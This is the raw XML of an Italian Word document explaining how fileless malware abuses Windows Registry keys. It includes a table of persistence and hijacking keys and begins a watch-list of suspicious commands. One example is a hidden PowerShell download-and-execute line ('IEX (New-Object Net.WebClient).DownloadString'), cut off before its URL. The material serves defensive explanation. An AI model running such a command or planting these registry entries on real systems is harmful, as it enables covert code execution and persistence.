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93F86" w14:textId="369B2461" w:rsidR="009819F2" w:rsidRPr="005E2E89" w:rsidRDefault="004C6185" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>I fileless malware e i registri di sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33E40C" w14:textId="572C8872" w:rsidR="00125DF2" w:rsidRDefault="00676D58" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione</w:t>
      </w:r>
      <w:r w:rsidR="004437DD" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00700FBC" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fileless malware</w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004410EE" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">possono sfruttare </w:t>
      </w:r>
      <w:r w:rsidR="002E7108" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">particolari </w:t>
      </w:r>
      <w:r w:rsidR="0079576D" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chiavi d</w:t>
      </w:r>
      <w:r w:rsidR="00700FBC" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">el registro </w:t>
      </w:r>
      <w:r w:rsidR="004C6185" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">per portare a compimento i </w:t>
      </w:r>
      <w:r w:rsidR="00E120F6" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>loro</w:t>
      </w:r>
      <w:r w:rsidR="004C6185" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> scop</w:t>
      </w:r>
      <w:r w:rsidR="00E120F6" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00125DF2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1B193" w14:textId="344FC90B" w:rsidR="006900E6" w:rsidRDefault="00125DF2" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Le HKEY non hanno tutte lo stesso scopo</w:t>
      </w:r>
      <w:r w:rsidR="006900E6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, ad esempio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabellachiara"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7029"/>
        <w:gridCol w:w="2599"/>
      </w:tblGrid>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="5C481518" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5E5763" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Chiave di Registro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4B494E" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Funzione / Abuso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="12146F80" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="545E18CD" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKCU\Software\Microsoft\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38EA5D92" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Persistenza a livello utente con esecuzione automatica al logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="74F95FD7" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35064396" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\Software\Microsoft\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5BB346" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Persistenza globale per tutti gli utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="24D66F14" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DDEAC06" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Winlogon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Userinit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027A31D5" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Esecuzione di codice durante la fase iniziale del logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="4D655FE5" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51701CAC" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">\Image File </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> Options&lt;programma.exe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508CB20" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Hijacking</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> dell’esecuzione tramite valore “Debugger”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="288B0D8F" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451CA2CB" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>AppInit_DLLs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769E0DF9" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Caricamento di DLL in più processi (iniezione di codice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="3C82287C" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7993E36A" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKCR&lt;estensione&gt;\shell\open\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398849C0" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Esecuzione di codice tramite modifica dell’associazione file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C1C40D4" w14:textId="77777777" w:rsidR="006900E6" w:rsidRDefault="006900E6" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F73805" w14:textId="5CB9B9DD" w:rsidR="008A58C2" w:rsidRPr="00E80709" w:rsidRDefault="00071949" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cosa scrivono i fileless malware sui registri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F080F34" w14:textId="1C97B9B3" w:rsidR="00145803" w:rsidRPr="00E97BB0" w:rsidRDefault="00145803" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">I malware fileless, sfruttando opportunamente le chiavi di registro di </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">sistema </w:t>
      </w:r>
      <w:r w:rsidR="00756929" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00756929" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrivendo all’interno comandi “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00756929" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>legittmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00756929" w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>possono creare danni al computer infetto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91AB7F" w14:textId="77777777" w:rsidR="00145803" w:rsidRPr="000D7F53" w:rsidRDefault="00145803" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">I comandi a cui prestare più </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7F53">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attenzione</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono quelli in cui compare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661AD91" w14:textId="6C2ADE7F" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>poweshell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>È il framework d’elezione per il malware fileless poiché integra nativamente il .NET e le API di sistema. La sua potenza risiede nell’</w:t>
      </w:r>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>esecuzione in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: può scaricare, decifrare e avviare payload complessi direttamente nella RAM, senza che alcun file tocchi mai il disco (evitando così la scansione degli antivirus tradizionali).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858A665" w14:textId="10381602" w:rsidR="00B3023D" w:rsidRPr="007B69A1" w:rsidRDefault="00B3023D" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B69A1">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A430C00" w14:textId="7F6CFBF5" w:rsidR="00B3023D" w:rsidRPr="00B3023D" w:rsidRDefault="00B3023D" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>powershell.exe -NoP -W Hidden -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> "IEX (New-Object Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
